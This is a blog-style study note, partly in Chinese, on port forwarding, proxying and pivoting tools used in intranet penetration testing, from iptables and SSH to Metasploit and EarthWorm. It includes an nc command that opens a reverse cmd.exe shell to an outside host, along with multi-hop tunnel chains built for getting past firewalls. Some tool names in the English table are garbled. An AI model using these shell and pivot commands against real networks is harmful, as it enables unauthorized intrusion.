Port forwarding in intranet penetration
It needs to be known that in the whole process of infiltration, infiltration is performed according to web applications or open ports. Obtaining webshell is only a small part of the art of infiltration. Intranet infiltration in a real and intricate enterprise environment is actually very deep. It involves a series of problems such as intranet penetration, port forwarding, domain penetration, and privilege escalation. So this article records some records of intranet penetration learning. In the process, I referred to the valuable experience of many predecessors. I collected these links and put them in the references section.
forwarding, mapping, proxying
These concepts are actually quite difficult to distinguish, especially when they are mixed with the intranet penetration later on. From a macro perspective, there is not much difference between them. But there is still a big difference in essence. Now let me talk about my personal understanding of these concepts:
- Forwarding: Forwarding is a means of infiltration, and it is the act of forwarding a network port from one network node to another. The result is that an external network user reaches a certain port of the internal network IP address through a NAT router. Sometimes also called a tunnel.
- Mapping: Mapping is also a means of infiltration. Port mapping is to map a port of the IP address of the external network host to a machine in the internal network to provide corresponding services. In fact, many times forwarding and mapping
- Proxy: Proxy is a result, based on port forwarding and mapping technology. Proxies are used on web services connected to the Internet on many occasions to break through IP blockade and hide identities. The principle is dynamic port forwarding. It only needs to establish a tunnel between the local machine and the proxy, and then the proxy can dynamically obtain the outgoing link address and port according to the request initiated by the local machine.
- Intranet penetration: Intranet penetration is the purpose, and the means it uses include port forwarding and mapping, or the result of directly using a proxy. In many cases, we refer to the intranet penetration scenario, which means that the attacking machine and the target machine are in different intranets, and some methods such as rebound shell can be directly realized, because the IP addresses cannot establish a connection with each other. At this time, you need to use some common tools for intranet penetration. These tools also use port forwarding and mapping or similar methods to break through the restrictions.
| tool name | The main purpose | platform | Remark |
|---|---|---|---|
| lcx | Port Mapping | Windows | Only supports port forwarding of the tcp protocol, not built into the system. Under linux, it is called port forwarding and port mapping |
| netsh | Port Mapping | Windows | Only supports port forwarding of tcp protocol, need to install ipv6 |
| rinetd | reverse proxy | Linux | Not built-in, you need to install it yourself |
| Earthworm | Port mapping, Socks5 proxy | Linux、Windows、MacOS、Arm-Linux | Non-system built-in, can support multi-level forwarding very conveniently |
| frp | High performance reverse proxy application | go | Based on the reverse proxy, it is very flexible to penetrate the intranet and bypass the firewall |
| reGeorg | Socks5 proxy | common scripting language | reGeorg uses webshell to build a socks proxy for intranet penetration. The server must support aspx, php, jsp, js and other web languages |
| Metasploit portfwd | Port Mapping | MSF -> Metpreter session | Need a good network condition |
| shocked | Port Mapping | Linux | may need to install |
| Metasploit->socks4a | reverse proxy | MSF -> Metpreter session | The session host needs to have an external proxy IP |
| barrel | HTTP tunnel | common scripting language | Requires scripting environment to execute, and is not very stable |
| localtuuel | Intranet public network mapping | knots | Like ngork, it can realize the mapping from the internal network to the public network port |
| snort | Intranet public network mapping | go | You can choose to build your own server or use the server that comes with the tool |
| dns2tcp | DNS tunnel | kaii inset | When the firewall filters the internal tcp outbound policy, go through the DNS tunnel, and relay the TCP connection through the DNS traffic |
| Iodine | DNS tunnel | linux | In principle, it is similar to dns2tcp |
| icmpsh | ICMP tunnel | need root privileges | It is necessary to prohibit the system from responding to icmp, and use tools to handle sending and receiving icmp packets |
System built-in forwarding tool
iptables NAT function
Due to the security considerations of the linux host, the system parameter /proc/sys/net/ipv4/ip_forwarddefaults to 0, so the NAT function is prohibited. We can modify the parameters of the system when it is running in the following two ways.
temporary plan
echo 1 >/proc/sys/net/ipv4/ip_forward
long term plan
runvi /etc/sysctl.conf
1 2 3 |
# Find the value below and change 0 to 1 net.ipv4.ip_forward = 1 |
Run sysctl –pfor the changes to take effect immediately.
Here is an example of forwarding
1 2 3 4 5 6 |
# 1.1.1.1 is public network ip, 192.168.2.2 internal network ip iptables -t nat -A PREROUTING -p tcp -d 1.1.1.1 --dport 80 -j DNAT --to-destination 192.168.2.2:8080 iptables -t nat -A POSTROUTING -p tcp -s 192.168.2.2 --sport 8080 -j SNAT --to-source 1.1.1.1 service iptables save |
This will make access to 1.1.1.1:80 mapped to port 192.168.2.2:8080. notice here
nc
1 2 3 4 5 |
# Public network host nc -lvp 4444 # Intranet machine nc -t -e cmd.exe public network host ip 4444 |
SSH
1 2 3 4 5 6 7 8 9 10 11 |
#Local port forwarding: ssh -CfNg -L port1:127.0.0.1:port2 user@host Parameters: -L Local network card address: local port: target address: target port #Remote port forwarding: ssh -CfNg -R port2:127.0.0.1:port1 user@hsst Parameters: -R remote network card address: remote port: target address: target port #Dynamic port forwarding ssh -D localhost:2000 [email protected] Parameters: -D local network card address: local port |
netsh
Netsh is a command-line tool for network management under Windows. It is an interactive shell, which involves the concept of context. We enter the corresponding context under the interactive mode to set the parameters. You can also perform port forwarding non-interactively as follows.
1 2 3 4 5 6 |
netsh interface ipv6 install
#Forward
netsh interface portproxy add v4tov4 listenaddress=10.10.18.1 listenport=4455 connectaddress=10.10.12.1 connectport=8080
#delete forwarding
netsh interface portproxy delete v4tov4 listenaddress={B's IP} listenport={B's port}
|
Non-built-in port forwarding tools
shocked
socat这个端口转发我们其实更常用在ssrf构造payload的时候本地抓包,因为socat有记录转发流的功能。将socat作为中介捕获我们构造的payload包,然后进行进一步的操作,如gopher协议的构造。
1 2 3 4 5 6 7 8 9 10 11 12 13 |
#安装 yum install -y socat apt install -y socat #TCP nohup socat TCP4-LISTEN:10000,reuseaddr,fork TCP4:1.1.1.1:10000 TCP4-LISTEN:10000 监听 ipv4 的 10000TCP 端口。 10000 改成你自己需要转发的端口 fork TCP4:1.1.1.1:10000 转发到 1.1.1.1 的 10000 端口,根据需求修改自行修改 ip 和端口 nohup 后台运行。可以把这个命令写到 /etc/rc.local 里面开机启动启动。 #UDP nohup socat -T 600 UDP4-LISTEN:10000,reuseaddr,fork UDP4:1.1.1.1:10000 |
lcx.exe
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
lcx-<listen|tran|slave> <option> [-log logfile] [option:] -listen <监听端口> <转发端口> -tran<监听端口> <目标地址> <目标端口> -slave <目标主机> <目标端口> <本地主机><本机端口> 内网机器上执行: lcx.exe –slave 公网IP +端口 内网IP +端口 例: lcx.exe –slave 192.168.43.142 51 192.168.43.137 3389 公网上执行: Lcx.exe –listen 监听51端口,转发到公网机器的3389端口 例: Lcx.exe –listen 51 3389 |
Metasploit socks4a
一组在实际渗透过程中的三件套:路由表+socks4a+proxychains。这样一来可以使用攻击机上的渗透工具,利用meterpreter session作为跳板,对内网进行渗透。下面的是流程。
1 2 3 4 5 |
1. 在反弹的shell中添加路由,如 run autoroute -s 192.168.122.0/24 2. 使用socks4a模块并设置端口 use auxiliary/server/socks4a 3. 配置proxychains |
Meterpreter portfwd
在MSF渗透框架里面内置了端口转发的命令,在回弹了shell的条件下可以直接使用,下面式相关参数解析。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]
OPTIONS:
-L <opt> 转发: 本地监听地址 反向: 本地主机连接到某个地址
-R 表示正向反向端口
-h 帮助信息
-i <opt> 端口转发条目的索引与交互(请参阅“列表”命令)
-l <opt> 转发:本地端口收听 反向:本地端口连接
-p <opt> 转发:远程端口连接 反向:远程端口监听
-r <opt> 转发:连接到远程主机
例子:
portfwd -L 127.0.0.1 -l 1212 -r 10.10.12.1 -p 3389
portfwd -R -L 10.10.18.1 -l 8080 -r 10.10.12.1 -p 8877
|
Rinetd
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 |
# 安装,注意到centos没有其默认的软件源,需要手动导入;ubuntu的比较方便 #centos 32 $ vim /etc/yum.repos.d/nux-misc.repo [nux-misc] name=Nux Misc baseurl=http://li.nux.ro/download/nux/misc/el6/i386/ enabled=0 gpgcheck=1 gpgkey=http://li.nux.ro/download/nux/RPM-GPG-KEY-nux.ro #centos 64 $ vim /etc/yum.repos.d/nux-misc.repo: [nux-misc] name=Nux Misc baseurl=http://li.nux.ro/download/nux/misc/el6/x86_64/ enabled=0 gpgcheck=1 gpgkey=http://li.nux.ro/download/nux/RPM-GPG-KEY-nux.ro $ yum --enablerepo=nux-misc install rinetd # ubuntu $ apt-get install rinetd #配置文件在/etc/rinetd.conf,配置参数格式 [bindaddress] [bindport] [connectaddress] [connectport] 绑定的地址 绑定的端口 连接的地址 连接的端口 [Source Address] [Source Port] [Destination Address] [Destination Port] 源地址 源端口 目的地址 目的端口 #举例 $ vim /etc/rinetd.conf 0.0.0.0 8080 172.19.94.3 8080 0.0.0.0 2222 192.168.0.103 3389 1.2.3.4 80 192.168.0.10 80 allow *.*.*.* logfile /var/log/rinetd.log #解释 0.0.0.0表示本机绑定所有可用地址 将所有发往本机8080端口的请求转发到172.19.94.3的8080端口 将所有发往本机2222端口的请求转发到192.168.0.103的3389端口 将所有发往1.2.3.4的80端口请求转发到192.168.0.10的80端口 allow设置允许访问的ip地址信息,*.*.*.*表示所有IP地址 logfil设置打印的log的位置 # 运行 #脚本启动 $ /etc/init.d/rinetd start #二进制启动 $ /usr/sbin/rinetd -c /etc/rinetd.conf #关闭(使用脚本,或则和pkill) $ /etc/init.d/rinetd stop |
Tunna 与 reGeorg
这两个工具的使用都是比较简单,就不啰嗦了,在获取webshell后,我们可以通过http进行端口转发。直接给出两个项目地址,推荐使用reGeorg,Tunna不稳定。Tunna工具地址
reGeorg工具地址。
Localtunnel与Gnork
这两个工具都可以将内网的端口映射到公网,然后访问公网的ip就类似于访问内网的端口。这两个工具可以提供自建服务或者使用它提供的服务器进行内网穿透。其实这类工具在实际渗透中不是很常用。更直接的场景是自己攻击机在内网,在进行相关回连操作的时候,需要目标机器可达,毕竟它们只是一级转发,而且操作麻烦。直接给出项目地址:
EW
工具的地址: EarthWorm
这是个国产的打洞神器,因为其方便的多级转发,支持反向代理等特性,在内网渗透领域可是响当当的。这里重点对这个工具做下记录,真的太强大了!
该工具共有 6 种命令格式(ssocksd、rcsocks、rssocks、lcx_slave、lcx_listen、lcx_tran)。下面针对官方的例子进行以下解释:
正向代理
1 |
$ ./ew -s ssocksd -l 1080 |
开启机器的1080端口做正向代理,我们可以通过链接该机器的1080端口进行端口代理转发。一般的场景为:kali 通过proxychain 链接开启了正向代理的公网ip。
反响代理
1 2 3 4 5 |
#公网ip主机A,ip假设为1.1.1.1 ./ew -s rcsocks -l 1080 -e 8888 # 目标机B ./ew -s rssocks -d 1.1.1.1 -e 8888 |
反向代理是目标机向我们发起链接请求,与正向代理是不一样的。当建立了链接后,它的代理流如下Me<--->A<--->B。即我只要连接A的1080端口就可以获得一条反向代理的隧道,与B建立连接。这种场景可以用来绕过入口策略严格但是出口策略松散的防火墙。
多级转发
在前面的两个场景中,我们看到了rcsocks,`ssocksd,rssocks这三个命令的使用。在多级转发中我们会见到另外三个命令的作用。他们就类似于中间件,负责隧道导流与串接。
1 2 3 4 5 6 7 |
#命令使用举例: # lcx_listen 用在将本机的端口进行转发 $ ./ew -s lcx_listen -l 1080 -e 8888 # lcx_tran 将本机端口与目的ip地址的端口进行转发 $ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999 # lcx_slave 作为奴隶,将本机直接可达的两个主机实体上的端口进行转发 $ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999 |
下面我们来看个实际渗透三级级联例子:
1 2 3 4 5 6 7 8 9 10 11 |
# 我们自己的VPS执行 $ ./ew -s rcsocks -l 1080 -e 8888 # 跳板机A执行 $ ./ew -s lcx_slave -d ip_A -e 8888 -f ip_B -g 9999 # 跳板机B执行 $ ./ew -s lcx_listen -l 9999 -e 7777 # 跳板机C执行 $ ./ew -s rssocks -d ip_B -e 7777 |
数据流向: SOCKS v5 -> 1080 -> 8888 -> 9999 -> 7777 -> rssocks。
我们来解读以下这个三级级联,首先这是个反向代理的例子,反向代理的目的端口是C的7777,当隧道建立完成,我们只需要连接到VPS的1080端口,就会自动帮我们转发到7777。我们来看下中间过程如何:首先第一个命令VPS在8888接收反向代理,并且在1080等候我们的连接。第二条命令将跳板机A的8888端口导向9999;第三行命令将跳板机B的9999端口导向7777;最后第四条命令在跳板机上进行反向代理发起连接到跳板机B的7777端口。
FRP
frp也提供了完善的内网穿透的功能,功能上其实和gnork这些差不多,但是相比起来,FRP的配置更为灵活。推荐层度:FRP>Localtunnel>gnork
过墙隧道
前面介绍的端口转发,有使用http协议,tcp协议,sockts代理的,但是这些协议转发流量太过于碍眼,容易被严谨的防火墙规则过滤,导致shell从内网出不来,那么在这种情况下,我们就需要强有力的过墙隧道。下面是笔者在网上搜罗的一些走udp的dns隧道和走icmp的隧道,可以说这两种打洞手段很别出心裁,笔者看得是叹为观止。这里先把相关的工具链接和看过的文章记录下来。写不动了……,避免篇幅过长(其实是有点懒),下次补上。